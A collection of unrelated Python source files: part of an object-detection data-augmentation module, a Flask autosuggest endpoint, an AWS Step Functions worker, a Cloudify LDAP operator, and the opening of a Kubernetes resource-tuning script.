for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9 = []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padx
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + pady
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padx
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + pady
labels9.append(labels)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for x in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
if len(labels9):
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
np.clip(labels9[:, 1:], 0, 2 * s, out=labels9[:, 1:]) # use with random_perspective
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
suggest.py
|
from flask import request
from flask import jsonify
from flask_cors import cross_origin
import threading
from autosuggest import AutoSuggestor
def load_in_background(nlp, app, queries_path, stops_path):
suggester = AutoSuggestor(
queries_path=queries_path,
stops_path=stops_path,
build_precount=False
)
app.logger.info("💡 suggestion ready")
nlp.set('suggester', suggester)
def add_suggest(app, nlp, queries_path, stops_path):
thread = threading.Thread(target=load_in_background, args=(nlp, app, queries_path, stops_path))
nlp.queue('suggester', thread)
@app.route('/api/suggest', methods=['GET'])
@cross_origin()
def suggest(): # pylint: disable=unused-variable
suggester = nlp.get('suggester', check_ready=True)
input = request.args.get('q')
results = suggester.auto_suggest_fast(input, nb_next_words=12)
results = [r[0] for r in results]
return jsonify(results)
|
worker.py
|
"""Activity task polling and execution.
You can provide you're own workers: the interface to the activities is
public. This module's worker implementation uses threading, and is
designed to be resource-managed outside of Python.
"""
import json
import uuid
import time
import socket
import traceback
import typing as T
import logging as lg
from botocore import exceptions as bc_exc
from . import _util
_logger = lg.getLogger(__name__)
_host_name = socket.getfqdn(socket.gethostname())
threading = None
def _import_threading():
"""Import ``threading`` multi-threading module."""
global threading
if threading is None:
import threading
class WorkerCancel(KeyboardInterrupt):
"""Workflow execution interrupted by user."""
def __init__(self, *args, **kwargs):
msg = (
"Activity execution cancelled by user. "
"This could be due to a `KeyboardInterrupt` during execution, "
"or the worker was killed during task polling.")
super().__init__(msg, *args, **kwargs)
class TaskExecution:
"""Execute a task, providing heartbeats and catching failures.
Args:
activity (sfini.activity.CallableActivity): activity to execute
task of
task_token: task token for execution identification
task_input: task input
session: session to use for AWS communication
"""
def __init__(
self,
activity,
task_token: str,
task_input: _util.JSONable,
*,
session: _util.AWSSession = None):
self.activity = activity
self.task_token = task_token
self.task_input = task_input
self.session = session or _util.AWSSession()
_import_threading()
self._heartbeat_thread = threading.Thread(target=self._heartbeat)
self._request_stop = False
def __str__(self):
return "%s - %s" % (self.activity.name, self.task_token)
__repr__ = _util.easy_repr
def _send(self, send_fn: T.Callable, **kw):
"""Send execution update to SFN."""
if self._request_stop:
_logger.warning("Skipping sending update as we've already quit")
return
return send_fn(taskToken=self.task_token, **kw)
def _report_exception(self, exc: BaseException):
"""Report failure."""
_logger.info("Reporting task failure for '%s'" % self, exc_info=exc)
tb = traceback.format_exception(type(exc), exc, exc.__traceback__)
self._send(
self.session.sfn.send_task_failure,
error=type(exc).__name__,
cause="".join(tb))
self._request_stop = True
def report_cancelled(self):
"""Cancel a task execution: stop interaction with SFN."""
fmt = "Reporting task failure for '%s' due to cancellation"
_logger.info(fmt % self)
self._send(
self.session.sfn.send_task_failure,
error=WorkerCancel.__name__,
cause=str(WorkerCancel()))
self._request_stop = True
def _report_success(self, res: _util.JSONable):
"""Report success."""
fmt = "Reporting task success for '%s' with output: %s"
_logger.debug(fmt % (self, res))
self._send(self.session.sfn.send_task_success, output=json.dumps(res))
self._request_stop = True
def _send_heartbeat(self):
"""Send a heartbeat."""
_logger.debug("Sending heartbeat for '%s'" % self)
try:
self._send(self.session.sfn.send_task_heartbeat)
except bc_exc.ClientError as e:
self._request_stop = True
if e.response["Error"]["Code"] != "TaskTimedOut":
raise
_logger.error("Task execution '%s' timed-out" % self)
def _heartbeat(self):
"""Run heartbeat sending."""
heartbeat = self.activity.heartbeat
while True:
t = time.time()
if self._request_stop:
break
self._send_heartbeat()
time.sleep(heartbeat - (time.time() - t))
def run(self):
"""Run task."""
self._heartbeat_thread.start()
t = time.time()
try:
res = self.activity.call_with(self.task_input)
except KeyboardInterrupt:
self.report_cancelled()
return
except Exception as e:
self._report_exception(e)
return
fmt = "Task '%s' completed in %.6f seconds"
_logger.debug(fmt % (self, time.time() - t))
self._report_success(res)
class Worker:
"""Worker to poll for activity task executions.
Args:
activity (sfini.activity.CallableActivity): activity to poll and
run executions of
name: name of worker, used for identification, default: a
combination of UUID and host's FQDN
session: session to use for AWS communication
"""
_task_execution_class = TaskExecution
def __init__(
self,
activity,
name: str = None,
*,
session: _util.AWSSession = None):
self.activity = activity
self.name = name or "%s-%s" % (_host_name, str(str(uuid.uuid4()))[:8])
self.session = session or _util.AWSSession()
_import_threading()
self._poller = threading.Thread(target=self._worker)
self._request_finish = False
self._exc = None
def __str__(self):
return "%s [%s]" % (self.name, self.activity.name)
__repr__ = _util.easy_repr
def _execute_on(self, task_input: _util.JSONable, task_token: str):
"""Execute the provided task.
Args:
task_input: activity task execution input
task_token: task execution identifier
"""
_logger.debug("Got task input: %s" % task_input)
execution = self._task_execution_class(
self.activity,
task_token,
task_input,
session=self.session)
if self._request_finish:
execution.report_cancelled()
else:
execution.run()
def _poll_and_execute(self):
"""Poll for tasks to execute, then execute any found."""
while not self._request_finish:
fmt = "Polling for activity '%s' executions"
_logger.debug(fmt % self.activity)
resp = self.session.sfn.get_activity_task(
activityArn=self.activity.arn,
workerName=self.name)
if resp.get("taskToken", None) is not None:
input_ = json.loads(resp["input"])
self._execute_on(input_, resp["taskToken"])
def _worker(self):
"""Run polling, catching exceptins."""
try:
self._poll_and_execute()
except (Exception, KeyboardInterrupt) as e:
_logger.warning("Polling/execution failed", exc_info=e)
self._exc = e # send exception to main thread
self._request_finish = True
def start(self):
"""Start polling."""
from . import activity
if not isinstance(self.activity, activity.CallableActivity):
raise TypeError("Activity '%s' cannot be executed" % self.activity)
_util.assert_valid_name(self.name)
_logger.info("Worker '%s': waiting on final poll to finish" % self)
self._poller.start()
def join(self):
"""Block until polling exit."""
try:
self._poller.join()
except KeyboardInterrupt:
_logger.info("Quitting polling due to KeyboardInterrupt")
self._request_finish = True
return
except Exception:
self._request_finish = True
raise
if self._exc is not None:
raise self._exc
def end(self):
"""End polling."""
_logger.info("Worker '%s': waiting on final poll to finish" % self)
self._request_finish = True
def run(self):
"""Run worker to poll for and execute specified tasks."""
self.start()
self.join()
|
tasks.py
|
########
# Copyright (c) 2019 Cloudify Platform All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from cloudify import ctx
from cloudify_rest_client import CloudifyClient
from cloudify import manager
from .operator import Operator
from flask import Flask, abort, request, jsonify
from threading import Thread
from datetime import datetime
import logging
import logging.handlers
import time
import os
def start(**kwargs):
''' Starts the operator process
'''
logger = configure_logging()
logger.info("Starting LDAP operator")
# For DEBUGGING locally
if ctx._local:
client = CloudifyClient(
host = '10.239.2.83',
username = 'admin',
password = 'admin',
tenant = 'default_tenant')
else:
client = manager.get_rest_client()
r,w = os.pipe()
pid = os.fork()
if pid > 0:
# wait for pid on pipe
os.close(w)
for i in range(10):
pid = os.read(r, 10)
if pid == "":
time.sleep(1)
logger.debug("waiting for pid")
continue
else:
ctx.instance.runtime_properties["pid"] = str(pid)
break
if pid == "":
logger.error("ERROR: Failed to get child PID")
os.close(r)
return
os.close(r)
os.chdir("/tmp")
os.setsid()
os.umask(0)
close_fds([w])
pid = os.fork()
if pid > 0:
os.write(w,str(pid))
os.close(w)
os._exit(0)
os.close(w)
# Needed by Flask
os.open("/dev/null", os.O_RDONLY)
os.open("/dev/null", os.O_WRONLY)
# Start REST server
app = Flask(__name__)
# init stats
stats = {}
stats['errcnt'] = 0
stats['actions'] = []
# init config
config = {}
config['log_location'] = '/tmp/log'
try:
set_routes(app, ctx.node.properties, stats, config, logger)
rest = Thread(target=app.run, kwargs={"debug":False})
rest.start()
except Exception as e:
logger.error(str(e))
os._exit(0)
# TODO Deep copy of properties to runtime_properties.
# To enable changes at runtime
Operator().operate(client, ctx.node.properties, stats, logger)
os._exit(0)
def stop(**kwargs):
''' Stops the operator process
'''
pid = ctx.instance.runtime_properties['pid']
ctx.logger.info("stopping process {}".format(pid))
res = os.system("kill "+str(pid))
if res != 0:
ctx.logger.error("kill failed for pid ".format(pid))
def operate(client, properties, stats):
''' OPERATOR MAIN LOOP '''
while True:
pass
def close_fds(leave_open=[0, 1, 2]):
fds = os.listdir(b'/proc/self/fd')
for fdn in fds:
fd = int(fdn)
if fd not in leave_open:
try:
os.close(fd)
except Exception:
pass
def configure_logging():
''' adjust below for logging needs '''
LOGDIR_NAME = 'operator.logs'
LOGFILE_NAME = LOGDIR_NAME + '/cfy_operator.log' #implementation should change this
LOGFORMAT = '%(asctime)s %(levelname)s %(message)s'
try:
os.mkdir("operator.logs")
except:
pass
logging.basicConfig(level=logging.DEBUG,
format=LOGFORMAT,
filename=LOGFILE_NAME,
filemode='w+')
logger = logging.getLogger('cfy_operator')
handler = logging.handlers.RotatingFileHandler(
LOGFILE_NAME, maxBytes=10**6, backupCount=2)
logger.addHandler( handler)
return logger
############################
# REST API
############################
def set_routes(app, properties, stats, config, logger):
@app.route('/')
def some_route():
return 'usage: TBD'
@app.route('/loglevel', methods=['GET','POST'])
def loglevel():
try:
if request.method == 'GET':
return '{"loglevel": ' + str(logger.getEffectiveLevel()) + '}'
elif request.method == 'POST':
body = request.json
if not body:
logger.error('unknown media type')
abort(415)
logger.info("body="+str(body))
if 'loglevel' not in body:
logger.error('loglevel key missing')
abort(400)
logger.setLevel(int(body['loglevel']))
except Exception as e:
logger.error("exception :"+e.message)
|
w2.py
|
#!/usr/bin/env python3
from __future__ import print_function
import sys
import os
import errno
import subprocess
import time
import calendar
import json
import select
import signal
import threading
import queue
# networking
import requests
import socket
import http.server
import socketserver
# 'compact' format json encode (no spaces)
json_enc = json.JSONEncoder(separators=(",",":")).encode
# debug
def dprint(*args):
print(*args, file=sys.stderr)
sys.stderr.flush()
# === const
INITIALIZER_NAME="initcfg.optune.io"
MEM_STEP=4096 # minimal useful increment in mem limit/reserve
CPU_STEP=0.001 # 1 millicore, highest resolution supported by k8s
Gi=1024*1024*1024
MAX_MEM=1*Gi
MAX_CPU=3.5
# === config ==============
# defaults
cfg = {
"url_pattern" : "https://us-central1-optune-saas-collect.cloudfunctions.net/metrics/{acct}/{app_id}/servo",
"account" : None,
"auth_token" : None,
"send_timeout" : 10,
"namespaces" : "default",
"appid" : "spec/containers/0/env/[JOBID]",
"sleeper_img" : "gcr.io/google_containers/pause-amd64:3.0"
}
# update from env
cfg["url_pattern"] = os.environ.get("OPTUNE_URL",cfg["url_pattern"])
cfg["account"] = os.environ.get("OPTUNE_ACCOUNT",cfg["account"])
cfg["auth_token"] = os.environ.get("OPTUNE_AUTH_TOKEN",cfg["auth_token"])
cfg["namespaces"] = os.environ.get("POD_NAMESPACES",cfg["namespaces"])
cfg["appid"] = os.environ.get("OPTUNE_APP_ID",cfg["appid"])
cfg["sleeper_img"] = os.environ.get("OPTUNE_SLEEPER_IMG",cfg["sleeper_img"])
# split into array for easy use
cfg["namespaces"] = cfg["namespaces"].split(",")
try:
debug = os.environ.get("OPTUNE_DEBUG",0)
debug = int(debug)
except Exception:
debug = 0
# === exceptions
class ApiError(Exception):
pass
class ConfigError(Exception):
pass
class UserError(Exception): # raised on invalid input data from remote OCO
pass
# ===
def k_get(namespace, qry):
'''run kubectl get and return parsed json output'''
# this will raise exception if it fails:
r = subprocess.check_output(["kubectl", "--namespace="+namespace, "get", "--output=json", qry])
r = r.decode('utf-8')
r = json.loads(r)
return r
def k_get_raw(namespace, qry, api="/api/v1"):
'''use kubectl to make a direct API call'''
if namespace:
tgt = "/".join( (api, "namespaces", namespace, qry) )
else:
tgt = "/".join( (api, qry) )
r = subprocess.check_output(["kubectl", "get", "--raw", tgt ] )
r = r.decode('utf-8')
r = json.loads(r)
return r
def k_patch_json(namespace, typ, obj, patchstr):
'''run kubectl 'patch --type=json' (list of patch ops) and return parsed json output'''
# this will raise exception if it fails:
cmd = ["kubectl", "--namespace="+namespace, "patch", "--output=json", "--type=json", typ, obj, "-p", patchstr]
r = subprocess.check_output(cmd)
r = r.decode('utf-8')
r = json.loads(r)
return r
def update1(obj, path1, path2, val):
""" find the earliest subpath in obj starting from path1 that exists and prepare a patch that would make obj contain path1/path2 with a value of 'val'. This also updates obj itself so that a subsequent call will use any sub-structures created by the previous patch(es), so that it works correctly when the patches are applied in order."""
# TODO: this works only for nested dicts for now; to add: arrays and arrays with key value (similar to k8s env array)
# assert path1 exists
tmp = qry(obj, path1)
if tmp is None:
dprint("ERR: no {} in {}".format(path1, repr(obj)))
return # FIXME raise H*ll
p2 = path2.split("/")
if p2[0] == "": p2 = p2[1:] # remove leading /
left = p2[0:-1]
right = p2[-1]
o = val
while left:
t = qry(obj, path1 + "/" + "/".join(left))
if t is not None: # this exists, add to it
tmp = t
break
# not found, go back to higher level
o = { right : o }
right = left[-1]
left = left[0:-1]
# make the update now on our copy of obj, so the next patch 'sees' the newly added elements
tmp[right] = o # adds or replaces it
path = path1 + "/" + "/".join(left+[right])
return { "op" : "add", "path" : path, "value" : o }
def update(obj, adj):
"""prepare updates for a tracked k8s object 'obj', in the form of a patch.
"""
#FIXME: proper handling of settings that don't match the app (e.g., non-existent components, values out of range, etc.)
patches = []
if "state" in adj and "application" in adj["state"]: adj=adj["state"]
containers = obj["spec"]["containers"] # should be present
cmap = { c["name"]:n for n,c in enumerate(containers) }
# patch = [{"op": "remove", "path": "/metadata/initializers/pending/0"}]
comps = adj.get("application",{}).get("components",{})
for cn,c in comps.items():
try:
idx = cmap[cn]
except KeyError:
raise UserError("application has no component '{}'".format(cn))
